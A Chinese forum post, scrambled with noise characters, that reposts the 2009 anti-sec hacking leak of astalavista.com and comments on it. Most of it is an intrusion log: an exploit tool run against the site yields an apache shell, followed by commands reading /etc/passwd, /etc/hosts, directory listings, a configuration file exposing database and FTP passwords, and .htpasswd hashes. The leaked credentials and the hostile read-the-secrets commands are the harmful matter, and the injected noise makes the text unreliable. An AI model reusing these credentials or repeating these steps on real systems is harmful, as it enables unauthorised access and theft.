里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。) q0 |$ [- M8 w5 z0 v- g+ v
3 b) n _$ }$ X% f' S
[root@front3 ~]# curl -I litespeedtech.com
9 ^ c- r$ l& G5 L1 f. ^HTTP/1.1 200 OK
6 x; |0 n/ V/ {) ?) D2 ZDate: Fri, 05 Jun 2009 22:54:51 GMT: }$ E! @6 o& z3 C
Server: LiteSpeed/ ~ G% ~% P4 X. S
1 A, p" u# b9 y- U
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-: ^; A- d6 l2 ~7 y$ S. S) g
3 d( }. k' \- A* B; x2 q
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。9 R& h- d' `/ `# f2 ^
m8 I& Y3 |: M$ g
, x& o2 T" X( \& Y6 H) F
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
$ }9 \, j; B- a. [/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
5 H% ^8 y7 _/ u/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
2 k. }7 c4 k: _$ m0 K7 a\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
/ ?: c0 v2 f# x2 M: Z \/ \/ \/ \/ \/ \/ \/
4 Z% B1 O7 j7 Q" d* b+ \! R The Hacking & Security Community" r4 Z. {& j6 k2 c/ t
[+] Founded in 1997 by a hacker computer enthusiast
3 i" q* h+ j( [$ T4 w9 U[-] Exposed in 2009 by anti-sec group
$ ^) M$ U2 D. v9 g
3 D4 h( w% c8 a8 s! uFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
$ w( y# F/ e; z>> 03. Who’s behind the site?
, P. ?! h8 V' U7 J>>: v# D' N4 V$ j: |- p( N
>> A team of security and IT professionals, and a countless number of contributors from all over the world.6 W1 u) N0 M6 h% P4 |* o5 v4 ~! u
3 ]# H! b) h2 \: E1 |$ t
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?' S) o7 b" {: O R! {0 i
>>8 m) E- q% E9 S+ Q! o+ y$ {
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
- l- P) ~/ [; H, H4 Q: y- Cmilitary institutions.
4 L9 g# `7 k' A+ g. q>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.* o0 w/ A$ e6 B& Q
+ X3 y8 W1 Y( G7 h* [! @- eWhy has Astalavista been targeted?) w! G0 n1 p. A# x! V
. _9 ]( [! ^# v, e2 p$ k. v" l2 T. y
Other than the fact that they are not doing any of this for the “community” but
2 r; g4 h$ b6 H& z. ^2 I8 Bfor the money, they spread exploits for kids, claim to be a security community1 `' A( u) c4 \7 p5 S" U
(with no real sense of security on their own servers), and they charge you $6.66
$ h6 a8 O2 j; O' {7 v* v% v; Jper months to access a dead forum with a directory filled with public releases
! O' y" f' w0 _and outdated / broken services.
( X3 y/ y% r+ B5 a1 x' I& t! w
7 D# W8 j, r+ h' J6 fWe wanted to see how good that “team of security and IT professionals” really is.
) c) ^( D! e# ?: [; k2 g. p' x9 q u
Let’s begin.
& I4 D# I4 R0 E6 \+ D) a: D5 `7 p0 H9 f
anti-sec:~# ./g0tshell astalavista.com -p 800 L2 m6 \+ h8 w8 H
[+] Connecting to astalavista.com:806 Q$ k2 B# Q0 ]) U: t
[+] Grabbing banner…2 a5 V4 k/ q+ o3 a; X" V9 p: _5 P2 V
LiteSpeed8 D4 e( x# u/ l
[+] Injecting shellcode…
, [0 n; ^% d' u[-] Wait for it
6 y+ d1 U. k; j2 _# \/ S6 B5 C; m8 s& q; N/ L
[~] We g0tshell
* @& E# u) Q. q$ B9 Euname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. j* b) J8 f7 q0 ~6 [
ID: uid=100(apache) gid=500(apache) groups=500(apache)
. T* k* L. t j4 y3 z' i c! c( q) B: n- I8 h: H; z
sh-3.2$ cat /etc/passwd
( u3 Y2 o* f& b! n; F" w6 Oroot:x:0:0:root:/root:/bin/bash
$ w# W/ E+ ~0 u6 Q( W' mbin:x:1:1:bin:/bin:/sbin/nologin
2 S5 g( {7 v9 w" m1 o- N: [5 }- `! R' |daemon:x:2:2:daemon:/sbin:/sbin/nologin
1 B8 R* n- l0 ^$ p" b! Uadm:x:3:4:adm:/var/adm:/sbin/nologin
' w b8 V3 o! X! {6 U" g( J3 h8 o( alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
/ e: I9 ^3 s c5 R* h7 ]# A3 J* xsync:x:5:0:sync:/sbin:/bin/sync
9 I% A! ?3 _6 l% jshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
& f% Y" z1 ?+ T3 X( e; bhalt:x:7:0:halt:/sbin:/sbin/halt
! a4 Z" h* w2 I8 Z W8 lmail:x:8:12:mail:/var/spool/mail:/sbin/nologin' J0 ]4 d* d2 \4 w5 a4 c4 C' t. R( d
news:x:9:13:news:/etc/news:
9 H0 P. K( z5 S/ Tuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
, R# _% C" w, m4 ]5 Zoperator:x:11:0 perator:/root:/sbin/nologin
# M8 s. N9 T" l" N9 ugames:x:12:100:games:/usr/games:/sbin/nologin
3 v( y2 k2 h% H; J4 Mgopher:x:13:30:gopher:/var/gopher:/sbin/nologin! [: F, Y$ m+ \
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin4 d% C( M, B4 l) w3 u! m1 i* r8 _% E
nobody:x:99:99:Nobody:/:/sbin/nologin- g O @2 V& B+ W/ ]
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
. G. f) w: X; S$ n5 Mdbus:x:81:81:System message bus:/:/sbin/nologin
9 C7 c3 Q/ S0 O: E; }, _$ b2 ?nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
$ u; n+ j8 k2 a$ ~' l" C8 @mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+ }5 Y3 G% Y4 V9 Y7 H* p: V) L% U2 Esmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
; o0 Z* \/ O. hvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin9 C2 w8 V9 g7 w2 @ r
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
# w* b# A0 L% d0 L: c" M; r8 `rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
' j7 ^- L/ h$ Z% I6 k8 U8 Lrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
8 k M# A1 ?) i, j% T1 w: znfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
& B. e7 Q& `) i5 R" Rsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
/ U4 k4 e; l3 n2 r1 vpcap:x:77:77::/var/arpwatch:/sbin/nologin G5 Y o; c( k# f" f
named:x:25:25:Named:/var/named:/sbin/nologin
! y9 ~( g+ q- W6 w4 \. E# Fapache:x:100:500::/var/www:/bin/false+ ^0 y( V O @3 w/ d( L: i
diradmin:x:101:101::/usr/local/directadmin:/bin/bash0 [" F, x, f* ^# [( t) N
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash3 r/ M) n3 f K4 W& |# n
webapps:x:500:501::/var/www/html:/bin/bash
4 ~" j6 l7 `1 h0 R6 L i( m: W2 Imajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
8 f H/ G0 }2 m! L, b; V, N/ ]admin:x:501:502::/home/admin:/bin/bash# A Y" D" O* F( W
jon:x:502:503::/home/jon:/bin/bash3 W9 V: ~' r( A0 X9 v# t& @
com:x:503:504::/home/com:/bin/bash
; }9 I; R' _2 L! w1 j) Zntp:x:38:38::/etc/ntp:/sbin/nologin
. W O8 Y, W# Kais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
9 f, R- h/ u- y, d- P0 X( wastanet:x:504:505::/home/astanet:/bin/bash6 h$ G5 S$ Z! z. C
avahi:x:70:70:Avahi daemon:/:/sbin/nologin2 K$ u) F# H0 x
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin {! W+ m& h5 o- m& Z2 ?8 N. \
0 A/ x# C) v- u8 }
sh-3.2$ cat /etc/hosts
- T; I+ r# Z: w) y. ~" ]4 b# Do not remove the following line, or various programs3 S% p6 T) b& a$ m+ D9 n
# that require network functionality will fail.
) d9 l1 G9 K7 s4 d5 c6 d/ p# s127.0.0.1 localhost.localdomain localhost9 m5 T# [6 y# r# g0 X: D; v( l
::1 localhost6.localdomain6 localhost6
. o/ L7 O; A7 ]4 h2 Q2 |80.74.154.172 asta1.astalavistaserver.com
6 B$ }8 _; _1 f) s' ~2 H! f
, e" V7 }3 f. Fsh-3.2$ pwd/ W- P" q- p+ W; Z8 z" K
/home/com/public_html
* z& A! c+ X) l7 ]" `7 c
/ {& H9 b( _0 B N" wsh-3.2$ ls -la
; N+ H+ n8 v6 ?total 184603 q' l' n2 n' |7 z3 I+ e; L2 e3 X
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
( F6 c- Y+ U6 Idrwx–x–x 11 com com 4096 Jun 25 2008 ..; g. P" G8 s" u: q- T
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
P- m- B& s( f P, C) W5 ^' Fdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
0 X' ~$ e# `. V/ y9 H' d4 _drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
- `0 p/ {+ |1 v. k9 Z. edrwxrwxrwx 2 com com 4096 May 19 00:50 config
! {3 x0 d6 R- ?" h; p# Vdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
+ O( T5 O! u( Xdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
/ }4 F9 y, |9 t. D2 r7 z' rdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing, W/ P0 O5 g* M: [% T/ b
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
# Y( T+ m4 G0 Ddrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__& Y: M: P3 ], v# V
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
7 @8 c2 s6 _+ S" E) ]" }9 Mdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
4 c. K4 D; s" E* I- tdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
3 V2 O0 I' C$ }* f( d W- r-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
! d+ y: E% z5 Q3 a8 m5 x7 Qdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed. J* U2 [: E- j% ~9 T8 ^
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
* u4 s8 d3 h2 D1 }-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak2 R/ a# v. |7 a+ _2 {
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
0 l, s- ?! t: F; r3 D1 e4 ?2 a: xdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
( a+ |5 g& d: U) w6 L( Odrwxrwxrwx 14 com com 4096 Feb 2 19:29 images3 f' Q4 Z1 U+ X% l
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php5 }8 a+ x( A) y% `( `: |
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer; T; l5 E5 l6 X! b1 z
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
) W! o$ O5 \" O5 F9 j* N1 R3 {drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
. N% W/ D. { _! Xdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
/ A/ i2 O2 V/ G2 a' Pdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications4 @: t; p3 n3 W8 J! e z1 ~+ g! D
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
0 [1 m2 ?: b* `; pdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
. n E% o* F( E5 g% A! K4 {# r6 _" Idrwxrwxr-x 22 com com 4096 May 28 17:06 _new2 L A: p* ?% x @3 i
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old% S+ u% A3 b) K" m& _/ L2 _
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy, E# o/ C2 @6 z" P
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
3 f) d1 [. V4 j; Q9 Z-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt# L# c8 I3 I/ i, v! |* B+ }
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml$ d3 ]! k, n9 Y) s
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php. y# W( z* [( ^4 W1 p( U$ x- W
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes r- F y" _5 T9 B; @- T
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp5 {) e! j3 c5 t! \% b5 }+ P9 N
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
) Y( X2 G- g, v! S1 W
]* j% _; o: i( msh-3.2$ head -20 index.php
6 v1 I0 v! M- d6 i5 K9 }<?php
1 y# R* [( _$ r. m/ }0 ]
( R# h6 E% |& {! k5 n! m; H$ L/**
0 Q) v* X1 {8 O" c4 J6 C* The main page for the CMS
7 |& d6 @3 s! g& Q* @copyright CONTREXX CMS - COMVATION AG
+ `- Q' @9 F& m5 e) Q4 _ ^* @author Comvation Development Team/ m2 e# D' ?8 ^( U0 w4 u7 w
* @version v1.0.9.10.1 stable
0 ~. R$ I/ E4 W6 b. {4 o- U" V/ v* @package contrexx* m, i7 q. g1 d: C2 V& T" p, o
* @subpackage core! x' G; ~# m) \0 W% m+ ~
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage. s. P/ c* I$ N$ Z" J! g, k
* @since v0.0.0.0/ n6 c$ ~# i8 \3 O0 Q
* @todo Capitalize all class names in project1 u e% U0 J+ A5 C) f( L
* @uses /config/configuration.php
& @2 ]1 _( W( f. t- }* @uses /config/settings.php+ I7 }( t9 h" W S$ d, g3 M& x" F, i
* @uses /config/version.php
. G! H. q g& R* G2 n$ Z0 M* }; H, v% q* @uses /core/API.php1 p% V. f4 p* W4 C! B9 D1 }3 @
* @uses /core_modules/cache/index.class.php
2 v& q4 H! S( E+ |1 f5 D* @uses /core/error.class.php
2 ?- X V& W: l# G* @uses /core_modules/banner/index.class.php9 m! R# k- a q* S
* @uses /core_modules/contact/index.class.php+ X9 Z6 y4 K' i1 f, c7 D5 L
& }0 L' e$ u: B0 }+ B2 @' `# Csh-3.2$ cd config/
: W/ U% a7 p. H6 {sh-3.2$ ls -la' o) S" a9 u) d5 y
total 32
6 f8 n( I: q4 C3 M! Y1 c: a6 L% d- fdrwxrwxrwx 2 com com 4096 May 19 00:50 . [0 ~5 J2 Y6 H/ }% Q* @! T1 o" E
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
7 D: k0 ?7 ?& B$ M-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php6 Y! \0 ]) |# o7 A
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
+ Q* q9 j/ q9 w1 K% k# }; ]& I-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
6 p/ Q7 ~. U$ r+ b( }-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
: L6 A* i- x7 p2 u h$ l0 I A f$ f, A
4 Z6 R7 o0 i3 _- m. m7 Fsh-3.2$ cat configuration.php$ N2 \! M: M$ |$ h8 Y) b# M
[snip]* W6 k% f D$ @3 Q* o7 Z. p$ y1 ]' s
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
( Y( ^' w$ {. F' e$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
' Q+ Y7 R) L6 X# t$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix0 |6 x* ^+ ]. e
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
X5 n8 t: c d' }3 p5 _9 x# q$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
( [* R1 V% o. S0 p; W$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)( o0 ?8 M' n" B
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)3 T- f6 g' F) k' x* c- J
[snip]
% ]8 u9 }; M! B# j+ [! h" n6 B$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
2 u) y8 M4 a5 U* \6 z$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode# G2 V# f# d5 ]- Z: t7 a
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
; m% W$ V; V2 F9 z$ m$_FTPCONFIG['port'] = 21; // Ftp remote port
. a' P, g7 V k' Y$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username" c: n/ o2 h! U. i! h
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password: b( y2 H0 }* W. }
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
9 r) J$ o2 {6 }! }: l5 O& `. L* u) b8 H$ S" e: I& e. z/ R
sh-3.2$ cd ..
. ]; `) N @8 |7 J! a7 P4 [/ x# Zsh-3.2$ cd dvd/" ^& w0 W8 t- Q: [2 O; y4 P
sh-3.2$ ls -la
8 F/ ]* ]" W' a' L+ I: Ztotal 2913780, t8 x/ ]3 s: f/ j
drwxr-xr-x 2 com com 4096 Sep 9 2008 .8 k) j4 r* B! g) ]" h4 ?
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..# f% k8 V, t+ g: y
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
, L3 m' H& I: r7 r0 h5 c-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
' s7 Z \5 {2 A3 n# u# C-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
[5 u2 t. m# [! V7 e-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess( _5 P& J' S; r# K K0 G
' A( |( i- S* B' g/ [" s
sh-3.2$ cat .htaccess- L4 a' B9 x: Z7 M2 u" q
authType Basic( d$ N$ x/ e; g+ o5 W. o
authName DVD8 j. Y0 }+ H$ o( k2 S+ d" \7 M
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd# [8 ?' P* C5 \6 h) ~, ]: q7 t
require valid-user4 w9 @$ A! X0 Z- r! b% Q
' N/ a4 u. Z% S( H1 c$ a2 esh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd* L) W5 Z- T1 G+ d/ h/ O2 i& I
DVDdownload:CRD8cuY6.MPT65 r3 ]) `- |6 a: N3 p+ l
DVDdownload2:CR8a36.wluFMg
! D% n6 }+ k. z5 P/ @
% X% e% P" i4 K+ U% c2 xsh-3.2$ cat test.php4 n6 g3 X' B/ M
<?php9 t Q# ?1 l y4 x- i
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;. _3 R: S1 A+ b1 s2 x0 g% a
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
- @6 l! T( L' b! k# lecho $url;
$ g" e0 \0 L) s% X?>
; l& P6 h- z" Q* w
; u. s; \1 _5 b: [" Hsh-3.2$ cd modifications/
a5 ~0 Y+ ?) M4 e: tsh-3.2$ ls -la% l8 Z! |( k7 M1 G0 B
total 32
6 D- F7 V% a8 \3 _drwxr-xr-x 8 com com 4096 May 11 12:48 .
/ F! m. p2 ?. w, N) u& e- e! Pdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ d7 O* b9 _/ } k. ?
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
5 p4 y; L- v6 w& K) c0 K+ G# ?( Gdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs6 D2 X0 N# k! @( M' B: \( R! |" n
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools: u* O! i+ L6 A z& w, S/ y
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc6 M; J0 l9 I% T V
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search; }1 f# u( x& h, h2 B0 x1 @( q
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
, s# V' k0 Z; s; d
2 P: O! ?' Y: Y& O$ k* Lsh-3.2$ ls -R1 k3 r3 ^2 |/ b$ g; U3 A3 P- V
.:
" U3 @) o F; ccom_avtng cronjobs onlinetools pjirc search _tmp2 V4 c" p7 O+ d
2 b3 p# C0 K2 C) s! G. M/ v6 c./com_avtng:
+ ~' e, X0 o. `avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
: O* {- b' ]$ O$ ~, ?
' @* D; X4 l9 @+ ?# I./com_avtng/scripts:3 [7 c4 V) {& t& u
popunder.js9 Q- ] @1 E" D5 I
, X6 w O* M* j M: N$ \* C A./cronjobs:
4 ?, _7 l4 E5 {' C. D- j/ ^0 Sexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp. B4 B1 s) x! o8 }
; ^2 g; W6 d% u1 w/ `0 x./cronjobs/tmp:
R9 M) E; H+ Scontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv ^5 j, C! _4 O, M5 e
/ _7 T9 N4 |% G# L5 p3 N
./onlinetools:. r) ?0 ~! _$ o/ d6 Z& G3 x
index.php" j# N2 A7 ~- y& j7 F. B4 R
, H4 g, w) _6 Q6 e& z./pjirc:$ f1 Z6 s! y% }
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt0 F8 ]7 _0 g1 ?- T" K1 _ {7 `
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
& e" [7 `3 {* E) t# t2 Y- s8 pbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
* P& B' ^- j5 {3 b0 M: J0 m" ?" g+ u8 W: r+ L# B
./pjirc/img:' @" u' D' Q3 q9 J, O
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
; h# ?. Y- }3 V( d& n. I# Marbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
/ @% X/ U* E5 Kverre-eau.gif$ B, ?' _ Z$ R+ A- S0 v0 N
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
L1 B* G% i0 D" Uverre-vin.gif
0 i- b$ G) O8 |0 Cballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
& T6 G E5 O! wbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif2 ]' L$ d% [$ e$ [: v8 V
9 S$ Y; k' ?7 h3 ] _ J6 s% y
./pjirc/snd:
7 Q& O6 S8 `' `4 n* ~4 @0 pbell2.au ding.au
) X+ [, ~& M3 |2 Z0 J5 e4 H/ f( d8 I& @( i% m/ e
./search:
1 E: x5 O2 _0 \6 B3 {searchEngines.php search.php
+ C6 F8 E4 e& A0 J
( M! K. ^" q+ T./_tmp:/ M6 W5 v( S$ e
defaultPorts.php defaultPorts.txt
3 R' G* [/ Y2 e
8 N' r, s, T: x b- Osh-3.2$ cd cronjobs/
/ d# X6 K1 L8 v: hsh-3.2$ cat exploits.php6 {9 F- Y5 l- Y3 n
[snip]
; P V2 R: O @/ N% y$categories = array();. [2 J1 _) W# R2 z
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;+ \7 g6 ]9 G6 N" `% E3 L* H d& V
$expolits = file($milw0rmFile);% w( x; K1 \3 p) J6 B1 h
$comExploits = array();
; H0 D* Q4 V7 N9 ~" S. s[snip]
r, A" E1 T$ s2 n( G2 A// manage data
& d; S7 I. j1 f8 [ j" ifor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26408 u9 t# P7 n% L" @5 i4 N
- o5 M7 T! Q+ b! ` // get path and title& P: c, ^/ u0 ?1 ]: S$ o. Z
$expolits[$x] = trim($expolits[$x]);
/ E0 s% M n, J% {4 x- U $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
* n+ y& E3 a, d $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);! h& F' a4 c" _
7 R1 L7 R0 e+ T" {8 O
// check if file exists" X; j0 j% }; I3 a+ U' |. h. C8 [/ ]
if (file_exists($path)) {1 X7 S! D$ I L! ?/ N
: e( J, c2 f( {; M/ V2 ~
$text = file_get_contents($path);9 J$ C' j. V, j( v- g& Z: ^# `
4 k, Z9 B$ B; b* \2 P' i
// get content and date
1 N$ c" R" m" ^5 K7 p8 A: D* Y //$text = htmlspecialchars($text, ENT_QUOTES);
# u o) P$ n8 H1 p; R5 F $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));/ V. Y+ u# R0 v8 s7 A: w" [1 |
if ($tmptext != ”) {* D" J6 N; J3 Y s( F
$text = $tmptext;: |, ~" V5 b. r; k
} else {1 t3 Y' F, z" O {
$text = addslashes(htmlentities($text, ENT_QUOTES));
* p) i: Y K7 K2 n! \9 M5 Z }
' u, Z8 V2 p5 O1 H7 { $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));6 S* k5 J4 k& \/ p) k/ V
$tmp = explode('-', $date);: _0 x) T6 u+ Q; g
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));; I7 g( }* L+ p
$cat = getCategory ($path);
! \% Q( T3 k9 E. j; c- ` $ext = pathinfo(basename($path));! a; Y( n9 B. [) F2 a
$ext = $ext['extension'];) S. c* l7 W3 K0 R4 L* X* G: s% T1 d
$qStr = ”
0 b, S# o+ N) n; F& s& ? SELECT `id`& g/ }( \: O0 c+ R
FROM `contrexx_module_exploits`
- l C! [: g& ?, {( ?0 V+ O7 H WHERE `title` = ‘” . $title . “‘
" i% G5 l- S; B4 h" ~+ ?6 s AND `date` = ‘” . $date . “‘
5 `. a+ F1 ^8 r- U4 Y “;: T7 S; h+ H3 `- W
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
3 t. X0 J4 L" `7 Y9 G6 { $q = $_objDB->query($qStr);2 D' |0 \# ~9 u5 i. W
! }. M I5 U1 K, i$ H if ($q->numRows() == 0) {# d1 C- ]: k5 E3 m: [
0 S3 g- v M) B6 s) o
// prepare array
, I* s; ^0 S6 H/ ]- X& n+ S1 N $comExploits[$x]['date'] = $date;( B( ~0 o W |4 E
$comExploits[$x]['title'] = $title;% a0 i8 y& C& x' T( T, Z( ?
$comExploits[$x]['author'] = ‘milw0rm’;
6 U3 D8 X+ E0 ^6 e2 z $comExploits[$x]['text'] = $text; `+ g$ j5 E: e
$comExploits[$x]['source'] = $ext;
" f- g& f* }2 [7 G1 e* y2 H $comExploits[$x]['url1'] = ”;" L. [# u+ u3 J- E. c4 g
$comExploits[$x]['url2'] = ”;
* w6 w3 l3 O4 E) x $comExploits[$x]['catid'] = $cat;
7 }5 I% p: x6 X: Z $comExploits[$x]['lang'] = ‘2′;
( z3 _9 d' b! s) y4 U7 ~7 u $comExploits[$x]['userid'] = ‘12′;! u7 D1 S; j- o2 O c: m4 T$ V
$comExploits[$x]['startdate'] = ‘0000-00-00′;
, a: x! Q% O- b+ n/ K $comExploits[$x]['enddate'] = ‘0000-00-00′;
8 y3 L u1 q( C5 D $comExploits[$x]['status'] = ‘1′;; I* u' r+ Q8 X3 r6 p5 t0 M$ o
$comExploits[$x]['changelog'] = $date;9 h8 i3 u/ W/ b9 b
2 p7 Y7 v6 q% I" y/ r7 I# y$ K
}& D1 A/ i& V: o9 ~4 q2 a8 N0 t
[snip]
r3 Z2 W# q6 S: ~7 w) R: z $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
7 M) m: C! `) l# W! C' I4 }( u<rss version=”2.0″>' t1 C4 E9 Y/ \) |1 {- @: _ ?
<channel>, _; ?- {* S2 V! e& ~* \
<title>ASTALAVISTA.com - Exploits</title>4 O* \' T* ^3 z
